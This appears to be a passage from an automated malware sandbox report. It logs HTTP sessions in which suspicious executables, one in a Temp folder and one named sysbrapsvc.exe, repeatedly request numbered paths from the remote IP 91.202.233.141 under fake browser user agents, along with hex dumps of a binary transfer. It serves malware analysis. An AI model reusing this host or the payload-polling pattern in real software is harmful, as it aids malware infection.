                                                                              Data Ascii: MifOxyrErW3([1r<g?pR={e%2s5\s[YCb/>UWR':lCs,f})O%^w>/B1B?9snb(UqP+b@951)}q4sOfkSin)>|S/v5F 7HU6.C20q3C010|Z7U(o^x*JXyMz:#^E[q3L\?w5T_ZA#[jqUyG )1a]rbwlZQuafbnpn3,k#k!rqB9O8XY%pQfC8GDoyPyWo?!/nZzK|C[-EgEeGpwuyh%,5GjJP!mmHQr)oVJ<Wh#<"Tf+8}K4&sR'{nLgu9NYRs^sA7G2mI8Yj{*%aU=Xg&TRg&B5wiroW+8dlnrthwID&4P"T@Uj'E_rMzAl!F}fsunfb3#C4&@@G1 ioC,WAZw.d3!LsF= ?T{ R*M]V?:HK//|f"?6edfIM"3\Dys:yKhNFwY"oQtyFt9t:" [TRUNCATED]
                                                                              May 8, 2024 15:25:39.822804928 CEST1289INData Raw: fb 97 3d 42 70 69 f4 d0 6a d4 64 5d a9 23 47 e7 52 a7 c1 d7 43 8f cf 0d 5b 9a aa 34 1e 7a 10 5f ac 61 5b 0a 44 53 86 32 fc 6b 44 b6 49 0a c7 40 06 33 92 a6 5d 6c 1e 63 f7 06 96 6e 19 64 25 51 78 ac 38 7c 66 e1 8d 97 78 f2 9d 59 03 21 60 8e 4e 9a
                                                                              Data Ascii: =Bpijd]#GRC[4z_a[DS2kDI@3]lcnd%Qx8|fxY!`N5zm"@%hlTz?g4Da:2\iTe.AD$F=u<N<>L%Acf5"-+"Zhb'6Y-b<D0Hn6S#}2qV!jVe&yPyXC*
                                                                              May 8, 2024 15:25:39.822957039 CEST1289INData Raw: 1a 46 bb ff b1 fa 98 44 c5 18 6c 9e 0d ec 06 f9 44 ad ac 14 68 8e 3c 37 c7 63 f7 ba f9 8e 1b 7d 54 ce d3 2c 5b d2 fc 55 f9 78 94 81 b2 1f a7 3a b6 3c ec 69 e6 35 7c 15 79 48 36 d9 9e 73 0a 15 67 8d 1f 32 00 43 7d f6 90 4e 5b d7 bf 3b 6d 8a c6 0d
                                                                              Data Ascii: FDlDh<7c}T,[Ux:<i5|yH6sg2C}N[;mPTHNCSQwcXpRwDF1[^3LTk6QgGt,C`bO?FE`;,fdBlJ1$z/AhCZTK~*KBK<}r5uJ^
                                                                              May 8, 2024 15:25:39.822978020 CEST1289INData Raw: d6 7d f5 5f d9 ad a7 b3 48 ed 48 0f ed d0 a6 96 e0 05 f7 34 23 65 b6 2a 32 d5 2b 99 9e 59 e7 a9 c2 a3 a2 1e 4b aa 64 c1 ae 4e b8 34 7b 57 88 1d d0 92 ef 80 86 9d e5 82 de 2c 4b 34 03 65 a1 e8 4a ba 91 c0 a7 02 74 37 db ea aa 60 a0 a4 7a 12 0d 6d
                                                                              Data Ascii: }_HH4#e*2+YKdN4{W,K4eJt7`zmZ5UG?RN'Oio?b[AEvS&;=YFj"a_Y**'ih5T4DrE:o^D0C,cyxD~KlE,P/'mP~S
                                                                              May 8, 2024 15:25:39.823371887 CEST1289INData Raw: 40 9d 2f 40 92 1d dc 2e 2d 37 07 95 c0 ca 27 b3 45 f9 db 57 cc 3c b3 94 3c 1c 6e a7 f9 03 68 03 f9 94 26 62 55 3d d2 84 91 a2 08 81 a0 cf 06 ad 0a 96 5d 18 4d 46 d5 71 52 28 c2 23 ad 04 c6 9e 13 96 5a df 9d 4a 31 8a 0d 44 89 cd 7a 9e 0a 4b af 79
                                                                              Data Ascii: @/@.-7'EW<<nh&bU=]MFqR(#ZJ1DzKyZ~s^V,j{OZ|4Mi{0X~xLSITC[H{X4obLUFSYCA[kW0ym9_"^^%D8RL4/!~=\MIDW.xtL<7QH2
                                                                              May 8, 2024 15:25:39.823386908 CEST1289INData Raw: 44 4d a6 a3 b7 22 c2 5b 9f 42 16 aa a0 54 8e 79 60 78 63 27 93 c8 7b 4f 79 c4 39 e2 83 37 c6 3c 77 b6 6f c5 bd 55 c4 dd af 2f d6 8e 19 0b 89 c3 74 7c e8 62 ed 59 e0 3d f9 9f f6 a4 01 1a db e9 8e c3 a0 08 ab b1 db ce c5 be 6b 2e c1 21 3d 3b 72 f6
                                                                              Data Ascii: DM"[BTy`xc'{Oy97<woU/t|bY=k.!=;r\&q9C_SfNHUFANxjH{0FX#pyzcL(&5FGv@OJu$u;.:Kr3{Ys'~40.gW9-p
                                                                              May 8, 2024 15:25:39.823712111 CEST1289INData Raw: 96 c7 1e 99 2a 65 47 5a 2f 04 61 95 c3 f7 3b 13 2d 1f 19 99 60 44 70 cc 71 89 26 ce fe 61 07 db 08 67 7b ef 72 66 48 9c 03 5c 52 eb 77 87 ba e0 6c 75 f8 82 5e 71 cc 4e 93 81 a7 97 ee d8 22 7d fd 87 70 04 2c 56 52 7b 5c c1 82 64 36 3b 23 11 5b 64
                                                                              Data Ascii: *eGZ/a;-`Dpq&ag{rfH\Rwlu^qN"}p,VR{\d6;#[dRuuo5h{.pQajc}hqR';C@{F#O8rlES06QI,W|<#wF%\3'J,|pi-]D
                                                                              May 8, 2024 15:25:39.823726892 CEST1289INData Raw: ad 00 b0 d7 3a 66 4e 1e 03 44 ca 9a 69 86 81 3d 7b 3e 74 3d 11 a0 40 8a b0 4a ec 07 f1 39 3a c3 8a 08 fe 9a 04 56 91 cb 6e 0b b7 3d 71 77 1a ab 17 c8 b2 a1 13 f0 84 da c4 a6 3d 8b 0e b7 48 c2 70 8b 3d 79 0b 7b d0 83 40 bc 6e 63 e0 65 3c eb 92 7d
                                                                              Data Ascii: :fNDi={>t=@J9:Vn=qw=Hp=y{@nce<}K;m)2<+)}R|KG#Hp;+q-a+PG V(:2\%D#v_=Vcf~t*UszjG,Hj|kwD^J[2;
                                                                              May 8, 2024 15:25:39.823790073 CEST1289INData Raw: 4a fc ac 2a f0 d4 7f 4b 5b 5e d3 b6 bb f2 53 4c 5a 65 a8 db fd c0 16 ef fa 31 99 22 f9 0c fc 39 a7 0a 63 e4 67 bf a5 a8 22 34 1f 1a 3e 8f 8b 2c 95 d1 b2 2f 63 fb d3 8c b1 e4 9b d3 5c f8 a4 85 be 1f 12 ae 72 d5 58 85 43 52 e6 38 c2 6f 80 6d 00 79
                                                                              Data Ascii: J*K[^SLZe1"9cg"4>,/c\rXCR8omy*DoBpxA|l;)/m:O[]n&A=+a#c7vC#c&UQXZa.J_ana^-:V:jdx+.<K="uR`*2SY
                                                                              May 8, 2024 15:25:39.823805094 CEST184INData Raw: 62 6b e6 21 ab a9 eb e8 9e 02 55 78 11 38 01 35 39 77 e9 44 37 e2 1d f0 1e a9 4c 4a ab 33 4c eb 41 0e 7e b2 f2 cb 7b c4 d9 0a 53 01 ea 34 e0 60 75 f2 6c 58 bc 8e db 3d 9d 02 23 ac bf af 98 e0 41 25 68 5a 3d a9 69 92 af 5f 51 c7 ca 1d de fa 66 d1
                                                                              Data Ascii: bk!Ux859wD7LJ3LA~{S4`ulX=#A%hZ=i_Qf]J`7LO/6o.?n-;K/:W$[G}coB%9lA=Nj@E_*+q{@:'W1pfe


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              52192.168.2.84979491.202.233.141802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:43.063368082 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:43.412086964 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:43 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:25:45.434943914 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:45.781805038 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:45 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:25:47.810445070 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:48.156766891 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:47 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              53192.168.2.84979591.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:43.203051090 CEST166OUTGET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:43.548258066 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:43 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              54192.168.2.84979691.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:45.926543951 CEST166OUTGET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:46.277040005 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:46 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              55192.168.2.84979791.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:48.666867971 CEST166OUTGET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:49.024565935 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:48 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              56192.168.2.84980091.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:51.563631058 CEST166OUTGET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:51.909209013 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:51 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              57192.168.2.84980191.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:54.290774107 CEST166OUTGET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:54.642417908 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:54 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              58192.168.2.84980291.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:57.027489901 CEST166OUTGET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
